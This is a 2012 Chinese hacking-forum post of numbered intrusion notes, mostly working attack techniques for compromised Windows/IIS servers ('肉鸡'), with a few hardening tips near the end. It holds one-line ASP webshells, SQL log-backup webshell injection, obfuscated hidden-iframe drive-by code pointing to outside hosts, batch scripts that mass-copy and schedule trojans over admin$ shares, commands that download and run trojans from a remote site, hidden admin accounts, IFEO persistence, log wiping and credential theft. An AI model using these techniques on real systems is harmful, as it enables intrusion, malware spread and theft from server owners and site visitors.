中国网络渗透测试联盟

标题: 入侵渗透笔记 [打印本页]

---

作者: admin    时间: 2012-9-15 14:13
标题: 入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统，cmd下，
- H/ S& |6 f, N* k- P& Ocacls C:\windows\system32 /G hqw20:R
) n9 D; t( X4 ?8 D5 b0 t9 n思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入
7 X0 g* n9 {( I" u; q, |恢复方法：C:\>cacls C:\windows\system32 /G hqw20:F
: w1 A' S, ]8 j; \; G+ B" ^
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。

3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。
9 s* u& L2 n; Y% e. D5 L
* n3 z5 R) h- v: [& F; y4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 _# A$ E6 g; n( `
5、利用INF文件来修改注册表
$ t7 P) S: R& j' a* r! v[Version]
Signature="$CHICAGO$"
$ k& W  q1 E% D+ n+ l$ w[Defaultinstall]
) m: ]5 I! N% q9 z6 l# XaddREG=Ating
6 L2 l3 I, \, g* @[Ating]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
  [- B2 {! S  t/ z' V以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：
6 U' F3 T1 n& ?( M4 [7 }+ brundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
8 c* ?) C! C) {3 V) F0 r其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU
, A+ L0 C6 O4 S, }HKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU
HKEY_CURRENT_CONFIG 简写为 HKCC
! d: d  w* y. C% o3 W0x00000000 代表的是 字符串值，0x00010001 代表的是 DWORD值
( z! Y4 i  G7 S" b2 P+ T$ u5 ]"1"这里代表是写入或删除注册表键值中的具体数据

4 U& z/ A, V0 M6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,
多了一步就是在防火墙里添加个端口，然后导出其键值
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]

7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
! K6 E% h3 B6 d1 d( B- d. U在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。

8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。
# E* h( w0 U2 f7 [+ ~
9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,
) y0 ?% ^$ T1 i! j: P. a可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。

10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
) V. D5 F* J- N$ Q% Q& u, d
  C0 P; {( p  {; g11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，
) y; `/ E. ~3 g. \+ u9 B用法：xsniff –pass –hide –log pass.txt

, V; C1 z& |  I" [6 p12、google搜索的艺术
! a$ G! p& r2 W! o5 C0 x搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
3 m8 [; L% i* V: z9 m2 r0 B或“字符串的语法错误”可以找到很多sql注入漏洞。
# q, g" z; t% J! U+ @3 `5 D# J
13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。

" \9 d: w6 y# Y: [  X5 l14、cmd中输入 nc –vv –l –p 1987
9 T! p4 p9 ]5 E1 X做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
+ G2 A7 P' _7 ^1 z
7 q7 Y. e; B7 I3 ~! b15、制作T++木马，先写个ating.hta文件,内容为
7 ]4 L7 L* B$ p" J<script language="VBScript">
set wshshell=createobject ("wscript.shell" )
a=wshshell.run("你马的名称",1)
window.close
</script>
再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 k# g' F8 B2 N4 q6 ^% _9 x8 L
16、搜索栏里输入
- S) Y9 z, W( ^+ I关键字%'and 1=1 and '%'='
关键字%'and 1=2 and '%'='
比较不同处 可以作为注入的特征字符
- Q: c; Y! l9 X$ S+ O
* W# Z& I3 Z- H8 a17、挂马代码<html>
, n9 V/ g- T" D' z8 w! Z. q<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
) P9 |9 s% z1 r/ i* r</html>
) i* O- T+ q8 Y  Q& v# Y! y
6 s- Z" S. P/ H18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
net localgroup administrators还是可以看出Guest是管理员来。

19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
用法: 安装： instsrv.exe 服务名称 路径
卸载： instsrv.exe 服务名称 REMOVE


21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
+ h  w/ `- D: B2 {* B不能注入时要第一时间想到%5c暴库。

; Z/ W$ B! S' p, @22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~

. b1 |% T" X5 V" m# J' n23、缺少xp_cmdshell时
# U+ n& x$ m8 p" Y0 g" M尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
假如恢复不成功,可以尝试直接加用户(针对开3389的)
4 ]! ^  d* J: `3 s% qdeclare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
' }& e8 I( n* [6 u* u
( X" u- \4 I! R! t$ O4 H# d3 u" W9 i24.批量种植木马.bat
7 o( |, ~6 P8 [2 d* [for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
7 z. z! F2 Q: D, B* ?- [% I+ ofor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
扫描地址.txt里每个主机名一行 用\\开头
, ?/ Z8 A/ R$ o0 R
; o1 S( E" ]' u4 B25、在程序上传shell过程中，程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下： <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
6 h, t/ G) k% f1 _
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
" x1 z0 Y; B8 G7 A; {) Q将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
1 ?; U$ h# b6 \! |1 h# C% ].cer 等后缀的文件夹下都可以运行任何后缀的asp木马
6 G5 Q+ I5 j5 D6 {% n. @5 H
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
然后用#clear logg和#clear line vty *删除日志
7 Q7 c1 X( E( u, M- X' d
0 f4 O" _- r$ V7 W1 z( J3 F$ ?28、电脑坏了省去重新安装系统的方法
纯dos下执行，
& ?4 V' p: [" ^3 x! w7 Y4 I, rxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
. D+ ?. o6 U- h# y% {2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
8 v1 C& `0 l, _% L
& U8 Y/ l; D8 A6 Y29、解决TCP/IP筛选 在注册表里有三处，分别是：
& J8 ?$ J- }% n& K" _HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
: h; p4 @- v2 _! D9 V1 eHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, g8 \5 x2 D% v7 q0 D8 z! FHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' W  {6 g/ S& Q! L; i, _: D分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 H! i# z' [* \5 [regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
, s( F# z' {6 H! O& Y: c2 k然后把三个文件里的EnableSecurityFilters"=dword:00000001，
% K& T8 N7 V- Y- N( N# e; w0 k改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
% @. l7 _0 u7 N4 Z  b8 l# Uregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。

30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3

; q- P# Q0 x$ V. V31、全手工打造开3389工具
打开记事本，编辑内容如下：
( S. A: E5 L5 T- P4 o# d: q6 r/ jecho [Components] > c:\sql
: @* K& t! b8 F. c) techo TSEnable = on >> c:\sql
- G2 A1 q: G! ^/ z: q4 ?. s/ }sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件，上传至肉鸡，执行
+ i: {- i2 S6 E% t7 q: G
7 ?4 S9 d6 |$ |32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
: ^' M$ D5 z# e% `
33、让服务器重启
写个bat死循环:
@echo off
3 K* g  T- D1 R! B:loop1
- e4 y5 v6 C1 c( wcls
start cmd.exe
! c  }! l7 C8 H' q4 n1 Hgoto loop1
7 E6 c1 `8 x. @2 y9 T, A* e/ a) J保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
; W% g% T6 ^8 E, H( F5 d( }  H  K4 [
, ^2 t& c' e& c" J7 M+ \( B34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，
/ Y& C+ ~0 Y- p' E, k3 e& z@echo off
; b  R8 N: b7 ^7 `* W$ u+ x/ d9 [date /t >c:/3389.txt
6 c" J" d' y1 m3 S9 atime /t >>c:/3389.txt
attrib +s +h c:/3389.bat
" O7 f( F/ M7 Q, g& Z6 Fattrib +s +h c:/3389.txt
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
/ \+ G- p' M; [7 A并保存为3389.bat
! b- k* J9 k/ F+ q打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号

# i  [+ `7 f& R7 y35、有时候提不了权限的话，试试这个命令，在命令行里输入：
* s; A, T  M5 s+ p+ ?$ J: lstart http://www.hack520.org/muma.htm然后点执行。（muma.htm是你上传好的漏洞网页）
: G9 l1 F3 I& T7 I输入：netstat -an | find "28876" 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。
  w4 B4 ^' ]2 {5 V  P) i, i
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
/ @+ G: y/ @- l# q  Iecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
echo 你的FTP账号 >>c:\1.bat //输入账号
5 K2 H' ^5 r; G7 {: Vecho 你的FTP密码 >>c:\1.bat //输入密码
+ w: p3 J4 p5 w" }echo bin >>c:\1.bat //登入
- h5 v% J9 F  J3 S3 d# xecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
echo bye >>c:\1.bat //退出
* N+ I9 i, t0 k/ {2 h4 T- ]& v然后执行ftp -s:c:\1.bat即可
  A$ _; Z8 S$ G( Q9 Y
# L: C$ d& q' @37、修改注册表开3389两法
! P) P0 L* _9 J' H7 @9 ]（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
>>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
% J" s! ?) v! r9 g. o: F5 ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
6 L) t2 [! G7 L+ j- W>>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
  l, l. X8 ?1 I6 h- ^' ]" N1 N0 y# decho "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
, P" B" ~/ h" \6 y1 E3 [>>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- k! `+ F  i& `echo "Hotkey"="1" >>3389.reg
- N% ~9 T* k. P! w. z% F( S& Y) r6 U' r8 cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 ~4 V- t4 t& F2 aServer\Wds\rdpwd\Tds\tcp] >>3389.reg
( t/ ]& a& _# H1 o( [$ Oecho "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
. p  E$ s5 h; V5 ~把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
4 w- h, ]$ e5 W因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
$ m: L( N$ b2 N- C（2）winxp和win2003终端开启
用以下ECHO代码写一个REG文件：
echo Windows Registry Editor Version 5.00>>3389.reg
: x  @! q; m5 m8 z4 a5 Z$ ^' Z6 yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]>>3389.reg
6 [/ V; v# n2 @* \echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
1 r" g4 y) E* \, ?# \. ~4 Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) N7 \# ?2 u4 rServer\WinStations\RDP-Tcp]>>3389.reg
  f7 q0 @8 l7 n# O9 O2 d: L2 q0 mecho "PortNumber"=dword:00000d3d>>3389.reg
然后regedit /s 3389.reg del 3389.reg
XP下不论开终端还是改终端端口都不需重启
* q. o6 c3 {) b5 G# D7 R
! b  k  G' q+ v. A& q0 H38、找到SA密码为空的肉鸡一定要第一时间改SA密码，防止别人和我们抢肉吃
4 R- A. t$ Q/ g0 g2 P用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
& n& y5 r5 Q# b( |9 [7 i% ^3 z& H6 @
, H) ]" |. B' U39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！
) ?: L/ t! N$ M% z* B（1）数据库文件名应复杂并要有特殊字符
8 R  j* V: k+ m6 u5 S（2）不要把数据库名称写在conn.asp里，要用ODBC数据源
将conn.asp文档中的
/ X) K( Q% \" _# {DBPath = Server.MapPath("数据库.mdb")
4 i5 \+ P( h& E) y/ m4 e  Vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" ＆ DBPath
0 a$ ]0 G: E# `$ z
修改为：conn.open "ODBC数据源名称," 然后指定数据库文件的位置
（3）不放在WEB目录里

40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
( I- a3 [- [& ^! `@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
2 C; T3 }! q4 e+ M) S7 q@del c:\winnt\system32\query.exe
  I4 h$ |0 H" M5 @5 P@del %SYSTEMROOT%\system32\dllcache\query.exe
) P2 G& I6 S2 K4 K  ^9 n% F6 u@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的

' p2 H! I9 J7 [8 @5 n3 I@echo off
; k5 n- m+ j1 C6 q, u8 Z! I9 t8 d  q# T@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
% H2 n" b* r8 L4 g  i@del c:\winnt\system32\tsadmin.exe
' C! y' k! s+ ]! }( @@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
0 U  E$ O8 T. |5 r' y+ n
9 b7 T# m1 O8 ~- c  d( t3 X41、映射对方盘符
telnet到他的机器上，
net share 查看有没有默认共享 如果没有，那么就接着运行
* y& F- x* W4 T5 _net share c$=c:
net share现在有c$
0 n5 S, ^: W3 U. ~5 S/ L在自己的机器上运行
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K
' r" h0 {3 k1 y; e. l1 A; Q) I; \
# I  n/ u% a  w+ X/ q42、一些很有用的老知识
6 G3 U9 S4 m$ z# n: wtype c:\boot.ini ( 查看系统版本 )
; B7 B  T& i' Tnet start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
5 P  s- N! k4 p4 |& gnet user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8

43、如果对方没开3389，但是装了Remote Administrator Service
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息
8 q; A7 i2 M" J% u, z( h先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
5 O0 E% k- j* K
44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）
/ T, U, Y1 o9 `5 ^. D$ {本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）
- p( X; ]' ?7 N9 C* c0 J# ]
  @$ X' W1 l2 p" d45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）
) Q$ C' ?* [# D- H% L0 |echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
* }* T- X7 j! {5 S4 q+ B8 z/ [^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
; ?7 k( N2 Z0 c; R' U' P, LCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
6 r8 J% h6 k" x1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
9 l0 q% m1 m$ u- v  u& o（这是完整的一句话，其中没有换行符）
然后下载:
1 i% P" x, s8 H4 X! ?* A; c  tcscript down.vbs http://www.hack520.org/hack.exe hack.exe

3 Y% C! `. a4 n1 K% ^46、一句话木马成功依赖于两个条件：
# _3 K' m+ W2 R2 y１、服务端没有禁止adodb.Stream或FSO组件
+ A9 r% p' W$ ~/ d9 P( o+ c２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
! j2 F  K1 u* h6 w
47、利用DB_OWNER权限进行手工备份一句话木马的代码：
2 S! d5 g. _2 f8 o8 t& Y& ^;alter database utsz set RECOVERY FULL--
;create table cmd (a image)--
;backup log utsz to disk = 'D:\cmd' with init--
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
2 o4 q& u& O% A6 _- |. Z' ]; S) M注：0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
% A$ K: i7 H8 C" ~+ X
1 U" B$ d' X. C1 \2 o) o( t48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
/ K' N5 U5 s: g所有会话用 'all'。
+ J) j2 G+ f4 ^6 P2 j; }' x-s sessionid 列出会话的信息。
3 s' p. d& }) x' D# o4 h+ C- X-k sessionid 终止会话。
-m sessionid 发送消息到会话。
( S% e$ p8 k' X
$ b$ x( W) ?5 z0 S/ f) zconfig 配置 telnet 服务器参数。

common_options 为:
-u user 指定要使用其凭据的用户
-p password 用户密码
, R* x% Y9 W8 w6 o
config_options 为:
dom = domain 设定用户的默认域
ctrlakeymap = yes|no 设定 ALT 键的映射
% `' P0 s9 a3 u( M- \timeout = hh:mm:ss 设定空闲会话超时值
7 b1 y: s+ x- a& Z% ^timeoutactive = yes|no 启用空闲会话。
! x/ a* H( w3 x# F" h4 @9 ~maxfail = attempts 设定断开前失败的登录企图数。
maxconn = connections 设定最大连接数。
! M# `" H* S! E1 z0 G1 jport = number 设定 telnet 端口。
sec = [+/-]NTLM [+/-]passwd
设定身份验证机构
. u" e+ t3 a5 z, y4 u, `* k8 ^fname = file 指定审计文件名。
; N% x& h3 a4 Q1 Ufsize = size 指定审计文件的最大尺寸(MB)。
mode = console|stream 指定操作模式。
& a: x4 z# L; Hauditlocation = eventlog|file|both
指定记录地点
audit = [+/-]user [+/-]fail [+/-]admin
2 L/ Q$ ?! @# g' o
49、例如:在IE上访问:
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
3 o; T) O; ?+ G: b2 {4 ohack.txt里面的代码是：
& x7 F- K/ o, d3 X. _6 K5 h<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
* e/ |. ?2 d$ r把这个hack.txt发到你空间就可以了！
这个可以利用来做网马哦！

50、autorun的病毒可以通过手动限制！
1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！
8 }! w+ y; O, A0 Z2，打开盘符用右键打开！切忌双击盘符～
3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！
& X' t5 B1 Z# M6 F' S& w
51、log备份时的一句话木马：
+ i7 T1 c5 S) ~a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>
3 H2 c) [# F! Af).<%if request("cmd")<>"" then execute request("pass")%>

52、at "12:17" /interactive cmd
5 u2 X5 j2 g/ j& Q执行后可以用AT命令查看新加的任务
- T( X* J& T9 s; x! N2 j0 D用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
/ t# R; W8 X6 t6 g
53、隐藏ASP后门的两种方法
1、建立非标准目录：mkdir images..\
拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
# S# o: {1 _: w通过web访问ASP木马：http://ip/images../news.asp?action=login
如何删除非标准目录：rmdir images..\ /s
! @/ G, m& J* v' ]9 [2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
; x, g1 k& N% d9 p9 t# cmkdir programme.asp
新建1.txt文件内容：<!--#include file=”12.jpg”-->
新建12.jpg文件内容：<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
* B+ a/ a: s  A% hattrib +H +S programme.asp
通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt
' a2 ~+ A% s" W  H7 D, V
9 d% e7 @# J6 Q: D$ j, r54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。
7 V3 }9 @, R" G; Y) F0 j/ k; Y然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。

! Y- J% H& X- U5 l  a& M55、JS隐蔽挂马
1.
# e6 s! K6 a% q5 }- kvar tr4c3="<iframe src=ht";
+ s6 [1 `: B; Q4 |tr4c3 = tr4c3+"tp:/";
- R/ [+ u- k3 [' e% j$ d' Y3 |tr4c3 = tr4c3+"/ww";
2 a5 ~- e. {2 m6 L5 str4c3 = tr4c3+"w.tr4";
5 ~: |9 F1 c- j* F1 y" D& ktr4c3 = tr4c3+"c3.com/inc/m";
+ n$ ^2 [' C; n4 h9 htr4c3 = tr4c3+"m.htm style="display:none"></i";
tr4c3 =tr4c3+"frame>'";
document.write(tr4c3);
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。
( V5 Y5 M* e  v# Q
- X. x' i& k9 S  C* y/ n2.
转换进制，然后用EVAL执行。如
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
不过这个有点显眼。
( U5 i% l' G1 H5 [& E2 ^3.
+ k2 N: a' T: l6 Q) z0 Odocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
. ]3 s' h" R, e: c最后一点，别忘了把文件的时间也修改下。
+ I; n6 _) S. |2 @8 U7 \/ L
5 |+ N& U& v* F2 t3 b1 l56.3389终端入侵常用DOS命令
7 {# f9 P. y5 R3 M& A: Ktaskkill taskkill /PID 1248 /t
9 u% @: u. M" ?  f$ Z8 v- J- f+ S
1 b7 o- G/ S% ~" I" [tasklist 查进程

cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
* y8 {/ C( @9 @1 }: c2 V9 Piisreset /reboot
tsshutdn /reboot /delay:1    重起服务器

' u* j5 T$ }4 ]4 n# ^2 b% glogoff 12 要使用会话 ID（例如，会话 12）从会话中注销用户，

query user 查看当前终端用户在线情况
/ X  j3 R! g6 J0 w0 J# C5 |
2 D$ g" U+ W8 B" n, d要显示有关所有会话使用的进程的信息，请键入：query process *
7 T' o0 s( l0 I/ C2 A
要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2
% r* o6 T" k' v8 O- s$ I* ]. r
0 q7 ?) |4 R5 H& ]  ]# w+ B, M要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2

要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02

. X4 i& [+ y' D7 T4 Z6 q! P2 }* Y命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启

! m. ^* N2 j' p3 u命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
% A* z% `& i. ?( d7 |, f# n  F
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。

$ _. H% u8 s- A3 F! w, r( e命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机

) a( f4 ], F& Z3 b4 f4 q1 o* h56、在地址栏或按Ctrl+O，输入：
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
) {3 F- q" I( s3 J$ i; l9 E
$ g2 n/ w: |" u4 K! T* T源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。

57、net user的时候，是不能显示加$的用户，但是如果不处理的话，
3 w! b9 J4 K! p用net localgroup administrators是可以看到管理组下，加了$的用户的。
. o! y, X0 y! t6 u, d% X! R( p
58、 sa弱口令相关命令
* J% u- N4 e% z* O) n
7 L9 t1 L" W, y. D4 ]* o一.更改sa口令方法：
用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'20001001','sa'
(提示：慎用!)
& o. p/ ], z6 \5 m& _
" S3 p/ @8 T4 C0 I- Y& S3 r( ]5 n8 |5 _二.简单修补sa弱口令.
( u3 n7 U7 U& V; m
方法1:查询分离器连接后执行：
' y  A  ?: T! E. h3 i7 v# ?if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
7 s( m3 G* j) \* _$ t) mOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
0 R1 D+ x& e- w( w3 f+ @
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' Y3 I" _+ k. U' k- G
GO

" M. D. ^: s0 D! i% W然后按F5键命令执行完毕
" j) a( {1 T$ o
( {  Y- U3 }: b) e6 t- h方法2:查询分离器连接后
- u6 K& U' _5 h9 Q0 n* Q第一步执行：use master
5 V8 o$ _) s3 h( {* d0 v# T第二步执行：sp_dropextendedproc 'xp_cmdshell'
